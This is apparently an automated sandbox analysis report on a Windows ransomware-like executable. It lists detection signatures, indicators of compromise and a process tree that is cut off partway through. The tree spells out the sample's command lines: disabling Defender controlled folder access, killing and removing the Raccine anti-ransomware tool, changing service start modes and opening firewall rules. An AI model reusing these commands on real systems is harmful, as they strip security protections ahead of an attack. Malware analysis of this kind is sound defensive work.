34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89

Resubmissions

29-10-2021 09:15

211029-k7w6esdad6 10

24-08-2021 15:41

210824-hbt188jvma 10

Analysis

max time kernel
151s
max time network
122s
platform
windows10_x64
resource
win10-en-20211014
submitted
29-10-2021 09:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Size

366KB
MD5

a24e438b9535cfb06f66dbd5b11a7680
SHA1

f998c708668743677064db9307cf274c17dd9a5a
SHA256

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89
SHA512

b65c5fac207297fe0219f03779729789de443880b1d71f099ec29a17183f37a1d9d8f1f2d4484f5fc95fa647562fd565e20a1f4a81b61d89e078a8405f41c5fa

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

description	flow	ioc
HTTP URL	34	http://live.sysinternals.com/PsExec.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2820	icacls.exe
3724	icacls.exe
3948	icacls.exe
2416	icacls.exe
1092	icacls.exe
3496	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\E:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\T:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\U:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\K:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\B:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\M:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\O:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\A:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\N:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Q:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\R:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Y:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\F:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Z:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\X:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\V:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\I:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\P:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\S:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\G:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\H:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\J:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\L:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Внимание Внимание Внимание!\r\n\r\nДобрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

pid	Process
2028	taskkill.exe
1204	taskkill.exe
816	taskkill.exe
1908	taskkill.exe
2112	taskkill.exe
3992	taskkill.exe
2124	taskkill.exe
3988	taskkill.exe
808	taskkill.exe
1028	taskkill.exe
3648	taskkill.exe
2316	taskkill.exe
1576	taskkill.exe
3972	taskkill.exe
3648	taskkill.exe
3112	taskkill.exe
3328	taskkill.exe
1464	taskkill.exe
1732	taskkill.exe
2500	taskkill.exe
1608	taskkill.exe
2428	taskkill.exe
3408	taskkill.exe
2984	taskkill.exe
948	taskkill.exe
1828	taskkill.exe
3456	taskkill.exe
1364	taskkill.exe
2168	taskkill.exe
3852	taskkill.exe
2472	taskkill.exe
1848	taskkill.exe
3580	taskkill.exe
336	taskkill.exe
2416	taskkill.exe
1720	taskkill.exe
1404	taskkill.exe
2812	taskkill.exe
1872	taskkill.exe
2628	taskkill.exe
3868	taskkill.exe
2624	taskkill.exe
3928	taskkill.exe
968	taskkill.exe
2168	taskkill.exe
2228	taskkill.exe
2960	taskkill.exe
3764	taskkill.exe
2024	taskkill.exe
1800	taskkill.exe
2820	taskkill.exe
2108	taskkill.exe
2628	taskkill.exe
2736	taskkill.exe
2492	taskkill.exe
2776	taskkill.exe
2716	taskkill.exe
720	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3096	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious use of AdjustPrivilegeToken 62 IoCs

description	pid	Process
Token: SeDebugPrivilege	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeDebugPrivilege	668	powershell.exe
Token: SeDebugPrivilege	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	336	taskkill.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	2316	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	2228	Conhost.exe
Token: SeDebugPrivilege	808	Conhost.exe
Token: SeDebugPrivilege	3328	taskkill.exe
Token: SeDebugPrivilege	2416	taskkill.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	2716	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	3764	taskkill.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeDebugPrivilege	720	taskkill.exe
Token: SeDebugPrivilege	1404	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1732	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	3992	taskkill.exe
Token: SeDebugPrivilege	3648	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	3580	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	3988	taskkill.exe
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	1848	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	816	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	3928	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	3852	taskkill.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	3456	taskkill.exe
Token: SeDebugPrivilege	2812	taskkill.exe
Token: SeDebugPrivilege	1028	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	2492	taskkill.exe
Token: SeDebugPrivilege	3408	taskkill.exe
Token: SeDebugPrivilege	2500	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	3648	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeDebugPrivilege	3444	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2748 wrote to memory of 3548	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	69
PID 2748 wrote to memory of 3548	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	69
PID 2748 wrote to memory of 3548	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	69
PID 2748 wrote to memory of 668	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	71
PID 2748 wrote to memory of 668	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	71
PID 2748 wrote to memory of 668	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	71
PID 2748 wrote to memory of 2984	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	74
PID 2748 wrote to memory of 2984	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	74
PID 2748 wrote to memory of 2984	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	74
PID 2748 wrote to memory of 3176	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	189
PID 2748 wrote to memory of 3176	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	189
PID 2748 wrote to memory of 3176	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	189
PID 2748 wrote to memory of 3096	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	78
PID 2748 wrote to memory of 3096	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	78
PID 2748 wrote to memory of 3096	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	78
PID 2748 wrote to memory of 3724	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	80
PID 2748 wrote to memory of 3724	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	80
PID 2748 wrote to memory of 3724	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	80
PID 2748 wrote to memory of 916	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	82
PID 2748 wrote to memory of 916	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	82
PID 2748 wrote to memory of 916	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	82
PID 2748 wrote to memory of 3468	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	188
PID 2748 wrote to memory of 3468	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	188
PID 2748 wrote to memory of 3468	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	188
PID 2748 wrote to memory of 3352	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	88
PID 2748 wrote to memory of 3352	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	88
PID 2748 wrote to memory of 3352	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	88
PID 2748 wrote to memory of 2908	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	87
PID 2748 wrote to memory of 2908	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	87
PID 2748 wrote to memory of 2908	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	87
PID 2748 wrote to memory of 3760	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	90
PID 2748 wrote to memory of 3760	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	90
PID 2748 wrote to memory of 3760	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	90
PID 2748 wrote to memory of 3944	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	92
PID 2748 wrote to memory of 3944	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	92
PID 2748 wrote to memory of 3944	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	92
PID 2748 wrote to memory of 1964	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	95
PID 2748 wrote to memory of 1964	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	95
PID 2748 wrote to memory of 1964	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	95
PID 2748 wrote to memory of 64	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	96
PID 2748 wrote to memory of 64	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	96
PID 2748 wrote to memory of 64	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	96
PID 2748 wrote to memory of 1800	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	187
PID 2748 wrote to memory of 1800	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	187
PID 2748 wrote to memory of 1800	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	187
PID 2748 wrote to memory of 336	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	100
PID 2748 wrote to memory of 336	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	100
PID 2748 wrote to memory of 336	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	100
PID 2748 wrote to memory of 948	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	101
PID 2748 wrote to memory of 948	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	101
PID 2748 wrote to memory of 948	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	101
PID 2748 wrote to memory of 2316	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	103
PID 2748 wrote to memory of 2316	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	103
PID 2748 wrote to memory of 2316	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	103
PID 2748 wrote to memory of 3868	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	106
PID 2748 wrote to memory of 3868	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	106
PID 2748 wrote to memory of 3868	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	106
PID 2748 wrote to memory of 2168	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	156
PID 2748 wrote to memory of 2168	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	156
PID 2748 wrote to memory of 2168	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	156
PID 2748 wrote to memory of 2228	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	185
PID 2748 wrote to memory of 2228	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	185
PID 2748 wrote to memory of 2228	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	185
PID 2748 wrote to memory of 3328	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	112

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Внимание Внимание Внимание!\r\n\r\nДобрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

C:\Users\Admin\AppData\Local\Temp\34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
"C:\Users\Admin\AppData\Local\Temp\34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe"
1⤵
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2748
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3548
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:668
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2984
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:3176
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3096
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:3724
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:916
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:3468
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:2908
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:3352
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:3760
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:3944
- C:\Windows\SysWOW64\sc.exe
